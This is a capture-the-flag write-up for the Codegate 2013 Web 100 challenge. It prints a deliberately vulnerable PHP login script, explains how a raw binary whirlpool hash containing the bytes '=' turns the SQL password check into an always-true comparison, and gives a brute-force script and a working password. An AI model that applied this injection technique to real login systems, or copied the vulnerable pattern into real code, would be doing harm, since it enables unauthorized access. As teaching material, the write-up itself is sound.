Codegate 2013 :: Web #1 (100 points)

This was the first challenge under the web category which was worth 100 points. It began with a short note from the organizer that read – “Let’s swimming!” and a hyperlink to a member login page which included the option to download the (zipped) source code for the website.

Contents of the zipped file:

• login.php_files – Folder containing css and image files
• db_schema.sql – Database schema file
• login.php.htm – Member login page
• login_check.php – PHP page to check the ID & password entered against the database entry

Contents of “db_scheme.sql”:

	create table users(
	idx int auto_increment primary key,
	user_id varchar(32) unique not null,
	user_ps char(64) not null
	);
	insert into users values (null, 'admin', 'f0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0f');

view raw codegate2013_web100_1.sql hosted with ❤ by GitHub

Contents of “login_check.php”:

	<?php
	if (!isset($_POST['user_id']) || !isset($_POST['password'])){
	die("parameter error");
	}
	$flag = "/flag.txt";
	$id = $_POST['user_id'];
	$ps = $_POST['password'];
	mysql_connect("localhost","codegate","codegate");
	mysql_select_db("codegate");
	$id = mysql_real_escape_string($id);
	$ps = mysql_real_escape_string($ps);
	$ps = hash("whirlpool",$ps, true);
	$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
	$row = mysql_fetch_assoc($result);
	if (isset($row['user_id'])) {
	if ($row['user_id'] == "admin") {
	echo "hello, admin<br />";
	die(file_get_contents($flag));
	} else {
	die("hello, ".$row['user_id']);
	}
	} else {
	msg("login failed..");
	}
	function msg($msg){
	echo "<script>";
	echo "alert('$msg');";
	echo "history.back();";
	echo "</script>";
	}
	?>

view raw codegate2013_web100_2.php hosted with ❤ by GitHub

In order to capture the flag for this challenge, you will need to gain access as “admin” so that the contents of “flag.txt” will be read and displayed.

The ID ($id) and password ($ps) values that are submitted to the form will be passed through the mysql_real_escape_string() function to escape special characters. A whirlpool hash for the password value will be calculated thereafter.

It is important to note that when the 3rd parameter for hash() is set to TRUE, the function outputs raw binary data as oppose to lowercase hexits when the parameter is set to FALSE. What this means is that you should not bother to perform bruteforce against the stored password value of ‘f0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0f’ cos it’s fruitless to do so.

The objective is to carefully craft a password value that will create a hash value that can nullify the user_ps parameter and gain admin access! How can you achieve that objective? Take some time to think about this before reading on.

---

Well to achieve that, you need to make use of type conversion during SQL expression evaluation. With type conversion, in particular string conversion to integer, you need to ensure hash() outputs a string value that matches this format (string1′=’string2). When $ps = string1′=’string2, the SQL statement becomes (select * from users where user_id=’$id’ and user_ps=’string1′=’string2′)

SQL expression evaluation will try to convert string1 and string2 to integer but as they are not integers, they will be cast to 0. Doing an equal comparison between two zeroes will evaluate to TRUE, thus making the latter part of the SQL statement to be TRUE and return all data associated with “admin”. The next step is to create a script to compute passwords that can satisfy the format for this attack to be successful.

Passwords Generation Script:

	<?php
	set_time_limit(0);
	for ( $i = 1; $i <= 5000000; $i++ ) {
	$digest = hash("whirlpool", $i, true);
	if (strpos($digest, "'='") != 0)
	echo $i . " :: " . $digest . "<br>\n";
	}
	?>

view raw codegate2013_web100_3.php hosted with ❤ by GitHub

Passwords Generated:

Using admin and 4075629 as the login credentials will grant you access as admin and have the flag revealed! 100 points in the bag. Yay!

Flag Captured:

Cheers,
Braeburn Ladny